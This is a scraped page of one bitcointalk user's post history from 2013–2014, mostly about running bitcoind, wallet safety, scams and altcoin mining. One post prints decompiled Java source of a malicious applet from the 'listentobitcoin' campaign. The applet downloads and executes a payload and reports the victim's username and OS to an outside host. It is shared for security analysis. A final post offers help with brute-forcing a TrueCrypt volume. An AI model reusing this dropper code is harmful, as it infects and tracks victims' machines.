41  Bitcoin / Bitcoin Technical Support / Re: Install Bitcoin Smart OS [HELP] on: April 09, 2014, 11:12:46 PM
I am currently learning Node.js and have set up a Node.js instance that I believe runs Smart OS.
I have downloaded the bitcoin source, but am having trouble installing and running bitcoind.
Does anyone have instructions to set it up on Smart OS?
From what I can see, SmartOS is an OS designed for Node.
I think it's unlikely you'll get the required libraries to work on SmartOS, and I don't know if there's a real compiler and dev tools available for it.

You'd be best running bitcoind on an alternate GNU/Linux server, and connecting to it from your SmartOS instance.
Note: if it's not on the same network, you'll want to set up RPCSSL or your connection could be compromised.

Okay So I saw this address on a forum member's signature. When I am trying to see it on blockchain it's giving me checksum error.
blockexplorer is also not loading, only blockr.io is able to show wallet balance which is 0 http://blockr.io/address/info/1MYpNKj25HRBFpv22YpuZsuz2zZHKBLUu

It's pretty much weird as he said, he generated it in multbit,

Read his signature again. You copied it wrong

There's an r at the end of the address.
43  Bitcoin / Development & Technical Discussion / Re: PHP Only Partially Reading Bitcoind on: April 09, 2014, 11:03:05 PM
As a general rule before you start messing around with custom applications just try executing the command from the command line
bitcoind <command> <arguments>
if you get nothing there then it isn't a PHP issue it means the bitcoind is broken or behind.

bitcoind getinfo

should give you some basic info like connections to the network and blockheight.
This ^^

Bitcoin and other coin daemons are VERY SLOW and can return odd results when they're behind on blocks. If you notice long load-times, that's one of the reasons most likely.
44  Bitcoin / Development & Technical Discussion / Re: How to implement sending and receiving coins in web application? on: April 09, 2014, 10:59:21 PM
Coinbase and Bitpay have nice APIs
thanks. any other ideas? without coinbase or bitpay?

If you set up Bitcoin's Daemon on your server, you can use the JSONRPC:

https://en.bitcoin.it/wiki/API_reference_%28JSON-RPC%29

This way your coins stay in your own hands at all time.

I'll vouch for him. He's worked on several big projects with me and other companies I've worked with.
47  Other / Meta / Re: "As your member rank increases, you can use more types of styling..." on: March 13, 2014, 06:47:27 PM
So my colours work if I add bold tags? -_-
EDIT: Yep that seems to be the case... Adding bold makes my colours work.
Still would love to know what "styling" you get at each rank.
48  Other / Meta / "As your member rank increases, you can use more types of styling..." on: March 13, 2014, 06:41:39 PM
I don't see any forum post here which tells me what styling I can use at which ranks. Right now I can't seem to use any colour in my signature...

NEW SCAM TOPIC

https://litecointalk.org/index.php?topic=17183.0

Does anyone have an account on litecointalk to write inside the topic and link the original one?
Thanks  Wink
I've removed the topic for you (probably best). If you can sign up on Litecointalk, I can change your name to "Sampey" and delete the scam account to prevent this from happening.

Just a little warning. TheProject has been spamming this thread agressively on IRC (specifcally in #litecoin), and I'm quite sure this is the same guy as "slamjamman" on IRC as well who turned me down simply because I asked him to send first (which is a perfectly good request considering he doesn't have any OTC rep), and when I pointed this out he simply disappeared from IRC, and later started to spam the thread in #litecoin under "TheProject"

[19:30:30] <slamjamman> I really need another .009 btc to buy something lol and I don't think I will be using this code
[19:30:31] <slamjamman> no I do not
[19:30:40] <Someguy123> well since I'm the highest rated here, send me the code first
[19:30:53] <Someguy123> I'll send you the 0.01 after I verify it works
[19:31:09] <slamjamman> ehh idk I'd rather not have it stolen. I'm gonna wait a bit and see if I can sell it to someone else who is willing to go first
53  Economy / Service Discussion / Re: Got this risk message, can someone elaborate on the listentobitcoin malware? on: January 18, 2014, 08:16:19 PM
Hello... Anybody... Is it a threat to Apple Macs?

thx
The virus appears to download an EXE payload. Whether or not it has alternative payloads for Mac or Linux is unknown, but if you've visited the site and allowed the JAR to run, you may want to run some form of mac security program, as it's now detected by a good amount of antivirus programs.
54  Economy / Service Discussion / Re: Got this risk message, can someone elaborate on the listentobitcoin malware? on: January 18, 2014, 08:06:04 PM
I decompiled their java file and it seems to be some kind-of download script. Here's malwarebytes post about it : http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/

Here's the source code decompiled for any security people
Code:
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class SecureJAR extends Applet
{
  public void init()
  {
    String str1 = System.getProperty("user.name");
    String str2 = System.getProperty("os.name");
    String str3 = System.getenv("temp");
    String str4 = "\\";
    String str5 = getParameter("rgsicvnjbn");
    String str6 = str4.concat(str5);
    String str7 = str3.concat(str6);
    Object localObject = getParameter("ioqujbjsyq");
    String str8 = "&yuvcpearce=";
    String str9 = getParameter("ivmbhojyjv");
    try
    {
      str2 = str2.replace(" ", "%20");
      str1 = str1.replace(" ", "%20");
      FileOutputStream localFileOutputStream = new FileOutputStream(str7);
      Runtime localRuntime = Runtime.getRuntime();
      URL localURL1 = new URL(getParameter("xmxdnhwphy"));
      URLConnection localURLConnection = localURL1.openConnection();
      InputStream localInputStream = localURLConnection.getInputStream();
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
        localFileOutputStream.write(arrayOfByte, 0, i);
      localInputStream.close();
      localFileOutputStream.close();
      localRuntime.exec(str7);
      localObject = new URL((String)localObject);
      getAppletContext().showDocument((URL)localObject);
      URL localURL2 = new URL("http://epickit.net/qsxnonlvrc.php?username=" + str9 + str8.replace("yuvcpearce", "evyaipgncs") + str2 + str8.replace("yuvcpearce", "piyhnvzbpw") + str1 + str8.replace("yuvcpearce", "tlbkqdpvxm") + "Traditional");

55  Alternate cryptocurrencies / Altcoin Discussion / Re: Litecoin Web Based or Light Client on: November 16, 2013, 10:00:13 PM
Do the exchanges provide your own independent addresses for use?
Pretty much.
Incoming only though. You can't sign using the address, and you can't send from that address. It'll come out of a random address, so don't try to play any dice games with one.

Is there a Litecoin Web Based or Light Client similar to blockchain.info or Electrum/Armory so that Litecoin can be used without downloading whole blockchain?

https://www.coinwallet.co
This is a horrible idea. As we've seen with instawallet, MyBitcoin, inputs.io and a variety of other services...
YOU CANNOT TRUST HOSTED WALLET SERVICES

Unless it's an in-browser managed wallet like blockchain, where the service doesn't get your private keys, then it's not safe.
The next safest place is in an exchange such as BTC-e.
Either way, the Litecoin blockchain is only around 4gb, compared to Bitcoin's 16gb+ blockhain, so you might be best just using the real client.

57  Bitcoin / Project Development / Re: [ANNOUNCE] +Coin Web UI for Bitcoin and its forks. on: November 09, 2013, 12:09:31 PM
I've updated it and submitted a pull request for a bunch of updates.

It's poorly written, probably buggy, and you could possibly loose all your coins, but hey, it works for me Smiley

I highly recommend using is with a secure web server (https://) you have to log into so that the data transfers are encrypted. Otherwise your passphrase for the wallet would be transmitted in plain text.

The point was originally to run it on a personal web server, (e.g. namecoin used to only have namecoind on windows, so webui = much better). I don't have too much time myself right now, but it shouldn't be too hard for someone to implement a login system.

ALSO - I donated 0.01 to tip4commit for -Coin. So anyone who adds new features or fixes them will get a small payment ( the small number in the tip4commit image below )

58  Other / Beginners & Help / Re: Just a silly question on: October 12, 2013, 06:09:43 PM
The issue is... how are you going to get that 142 USD into Bitstamp? That's your problem.
If it's via bank, you'll be waiting days and the price will have changed.
If it's by something similar to Bitinstant, you're facing ridiculous fee's that make it a lot less profitable.
59  Alternate cryptocurrencies / Altcoin Discussion / Re: merge mining on litecoin, feathercoin etc. on: October 12, 2013, 06:07:02 PM
Hi all,

Is merged mining possible with litecoin, feathercoin etc. ?
And how?

Regards,

AtBr
No. It's not possible because Litecoin and Feathercoin use Scrypt, which is a completely different algorithm to Bitcoin's SHA256.
Plus, I'm pretty sure that the coin needs to have its own merged mining system built into the code, just as Namecoin is setup.
60  Other / Off-topic / Re: Truecrypt brute force software? on: August 18, 2013, 10:06:17 AM
You'll need to be more specific, what are you cracking it on? Are you on windows? are you going to be doing this with an Nvidia or AMD GPU? maybe even your CPU?
